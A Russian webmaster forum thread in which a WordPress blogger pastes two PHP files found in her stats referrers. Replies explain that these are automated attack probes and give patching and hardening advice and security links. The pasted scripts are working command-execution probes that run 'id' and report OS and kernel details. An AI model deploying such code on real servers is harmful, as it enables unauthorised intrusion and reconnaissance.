Реклама на сайте Advertise with us

Ломают блог?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

АВМ женского пола

С нами с 09.02.06
Сообщения: 1292
Рейтинг: 1022

Ссылка на сообщениеДобавлено: 21/04/08 в 10:16       Ответить с цитатойцитата 

в статисики блога странные урлы..

http://seo-storage.info/st.jpg
в этих текстовых файликах лежит такое:

Код:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


и такое:

Код:

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


не разбираюсь в php ((
такое ощущение что пытаются сломать блог.. или я параною?[/img]

Блог АВМа Женского Пола | LL

0
 

легионер МММ

С нами с 18.04.03
Сообщения: 6239
Рейтинг: 786

Ссылка на сообщениеДобавлено: 21/04/08 в 10:30       Ответить с цитатойцитата 

угу, ломают, но это обычно на автомате все делается.
так что следи за апдейтами и патчами от разработчика =)

Гiмн Хазарiи

6
 

АВМ женского пола

С нами с 09.02.06
Сообщения: 1292
Рейтинг: 1022

Ссылка на сообщениеДобавлено: 21/04/08 в 11:43       Ответить с цитатойцитата 

начиталась про проблемы апдейта WP.. так нехочется..но прийдется видимо..
а что конкретно делают?

Блог АВМа Женского Пола | LL

0
 

легионер МММ

С нами с 18.04.03
Сообщения: 6239
Рейтинг: 786

Ссылка на сообщениеДобавлено: 21/04/08 в 12:07       Ответить с цитатойцитата 

доступ к панели управления пытаются получить вестимо

http://www.yugatech.com/blog/the-internet/hack-attack-in-progress/

Гiмн Хазарiи

6
 

Вселенский разум

С нами с 18.10.04
Сообщения: 2563
Рейтинг: 1227

Ссылка на сообщениеДобавлено: 21/04/08 в 12:12       Ответить с цитатойцитата 

да пытаются вытянуть базу юзеров используюя sql иньекцию, и тем самым получить доступ к админке

6
 



С нами с 04.04.07
Сообщения: 101
Рейтинг: 26

Ссылка на сообщениеДобавлено: 21/04/08 в 14:19       Ответить с цитатойцитата 

Вообще лучше .htaccess'ом сразу при установке закрывать страницу логина и проблем заметно убавится.

6
 



С нами с 25.09.03
Сообщения: 3833
Рейтинг: 1767

Ссылка на сообщениеДобавлено: 21/04/08 в 15:28       Ответить с цитатойцитата 

Про безопастность wordpress читаем здесь - http://streha.ru/2007/09/19/zashhiti-sebya.html

Старый друг лучше новых двух. Им я доверяю свои проекты.

6
 

АВМ женского пола

С нами с 09.02.06
Сообщения: 1292
Рейтинг: 1022

Ссылка на сообщениеДобавлено: 21/04/08 в 15:48       Ответить с цитатойцитата 

уу.. как всё.. спасибо, побежала устранять уязвимости
вот кстати линка про XSS уязвимость(очень распространеная услуга оказывается - прогон по XSS базам)
http://maxsite.org/anti-xss-attack
если у кого-то еще есть мысли и методы защиты - выкладывайте!!

Блог АВМа Женского Пола | LL

0
 



С нами с 25.09.03
Сообщения: 3833
Рейтинг: 1767

Ссылка на сообщениеДобавлено: 21/04/08 в 18:08       Ответить с цитатойцитата 

Еще несколько ссылок:
Список дырявых плагинов WordPress
http://habrahabr.ru/blog/wordpress/36973.html

Как узнать что меня взломали?
http://blogproseo.ru/kak-obezopasit-blog-rabotayushhij-na-wordpresse-ot-vzloma/

WordPress 2.5 - Уязвимость “Секретного ключа”
http://www.cybercore.ru/wp-25-secret-key-vulnerability/

Старый друг лучше новых двух. Им я доверяю свои проекты.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »